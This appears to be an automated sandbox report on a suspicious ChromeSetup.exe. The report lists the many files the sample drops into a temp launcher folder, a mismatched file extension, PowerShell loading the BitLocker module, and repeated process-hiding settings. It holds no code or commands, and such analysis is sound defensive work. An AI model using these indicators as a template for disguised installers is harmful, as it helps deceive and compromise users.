Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\nio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\lcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\UAC.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fontmanager.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\deploy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\hprof.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jawt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsound.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_sw.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\decora_sse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\net.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glib-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jli.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glass.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\bci.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\npt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\Intel_Processor_Identification_Utility-Legacy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsdt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\awt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font_t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsoundds.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\NAct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\management.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\mlib_image.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\wsdetect.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dcpr.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl

Jump to dropped file

Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
